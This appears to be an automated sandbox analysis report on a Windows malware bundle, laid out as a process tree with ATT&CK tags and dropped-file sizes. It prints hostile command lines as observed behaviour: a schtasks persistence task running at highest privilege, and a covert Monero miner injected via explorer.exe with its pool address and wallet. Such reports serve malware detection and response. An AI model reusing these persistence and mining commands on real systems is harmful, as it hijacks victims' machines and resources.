C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x64.exe /install /quiet4⤵
-
C:\Users\Admin\Documents\VC_redist.x64.exeVC_redist.x64.exe /install /quiet5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x86.exe /install /quiet4⤵
-
C:\Users\Admin\Documents\VC_redist.x86.exeVC_redist.x86.exe /install /quiet5⤵
-
C:\Windows\Temp\{B289DA0A-836C-4A8A-9DA1-4168C58199BA}\.cr\VC_redist.x86.exe"C:\Windows\Temp\{B289DA0A-836C-4A8A-9DA1-4168C58199BA}\.cr\VC_redist.x86.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x86.exe" -burn.filehandle.attached=576 -burn.filehandle.self=584 /install /quiet6⤵
-
C:\Windows\Temp\{59B2F177-22F7-4427-AD66-990CDA6B21D9}\.be\VC_redist.x86.exe"C:\Windows\Temp\{59B2F177-22F7-4427-AD66-990CDA6B21D9}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{399B689F-8033-46E5-B5E3-289A96EBE609} {75AEF579-016F-4CB3-A9BE-3D80B684C0EC} 46607⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 8687⤵
- Program crash
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RJB75.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJB75.tmp\installer.tmp" /SL5="$6030C,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"6⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 4925⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 13565⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GIFT8.tmp\n06BeJZiAJ9ZGyBXLy2bju0A.tmp"C:\Users\Admin\AppData\Local\Temp\is-GIFT8.tmp\n06BeJZiAJ9ZGyBXLy2bju0A.tmp" /SL5="$202CC,138429,56832,C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-LM76P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LM76P.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-LTI9T.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-LTI9T.tmp\MediaBurner2.tmp" /SL5="$30308,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-UNCCA.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-UNCCA.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
-
C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe"C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KS6L5.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-KS6L5.tmp\ultramediaburner.tmp" /SL5="$90250,281924,62464,C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe" /VERYSILENT10⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ec-91e8d-2f4-3d8a4-dbd8bdaa020ca\Mopimukoxe.exe"C:\Users\Admin\AppData\Local\Temp\ec-91e8d-2f4-3d8a4-dbd8bdaa020ca\Mopimukoxe.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\f0-47c04-84b-db29a-3783c8f0e7b9f\Qaevemishifu.exe"C:\Users\Admin\AppData\Local\Temp\f0-47c04-84b-db29a-3783c8f0e7b9f\Qaevemishifu.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lgayu3ic.jk0\GcleanerEU.exe /eufive & exit10⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exeC:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1lm122iq.23c\ufgaa.exe & exit10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exeC:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe"C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe" -q12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 79213⤵
- Program crash
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\areua4by.v3l\gcleaner.exe /mixfive & exit10⤵
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 17927⤵
- Program crash
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'8⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth8⤵
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a7⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6891150.exe"C:\Users\Admin\AppData\Roaming\6891150.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7120 -s 22728⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\6280455.exe"C:\Users\Admin\AppData\Roaming\6280455.exe"7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Roaming\6446650.exe"C:\Users\Admin\AppData\Roaming\6446650.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\5975108.exe"C:\Users\Admin\AppData\Roaming\5975108.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 23288⤵
- Program crash
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 8PFJ7Xr/RkiQhw851r/usQ.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 4483⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4828 -ip 48281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5388 -ip 53881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5280 -ip 52801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5360 -ip 53601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5328 -ip 53281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4112 -ip 41121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5632 -ip 56321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5868 -ip 58681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1432 -ip 14321⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Temp\{CD37212B-4F5F-473E-978C-DF9ADC88A7A9}\.cr\VC_redist.x64.exe"C:\Windows\Temp\{CD37212B-4F5F-473E-978C-DF9ADC88A7A9}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x64.exe" -burn.filehandle.attached=584 -burn.filehandle.self=580 /install /quiet1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Temp\{B9B8ED8E-F0C5-482C-8C59-6CB7FA4773F1}\.be\VC_redist.x64.exe"C:\Windows\Temp\{B9B8ED8E-F0C5-482C-8C59-6CB7FA4773F1}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{D51149BE-F0A0-4B20-BBEA-5024E56AD5CD} {DC0B5AF9-C616-4544-A18F-83C2B15C0C72} 56482⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 14082⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5200 -ip 52001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 672 -p 4964 -ip 49641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5796 -ip 57961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 4563⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5380 -ip 53801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5724 -ip 57241⤵
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5648 -ip 56481⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3E5B60605DF948EA26B9487A719F4DEC C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F27C5DD74EAE78A12C670EA9177EE3C92⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1F7F67D099579AFBE22A390550F72D7B C2⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 7120 -ip 71201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5096 -ip 50961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4660 -ip 46601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7024 -ip 70241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7024 -ip 70241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1492 -ip 14921⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
436KB
-
Filesize
2.5MB
-
Filesize
88KB
-
Filesize
8KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
1.7MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
828KB
-
Filesize
444KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
628KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
8KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
36KB
-
Filesize
628KB
-
Filesize
1020KB
-
Filesize
80KB
-
Filesize
440KB
-
Filesize
828KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB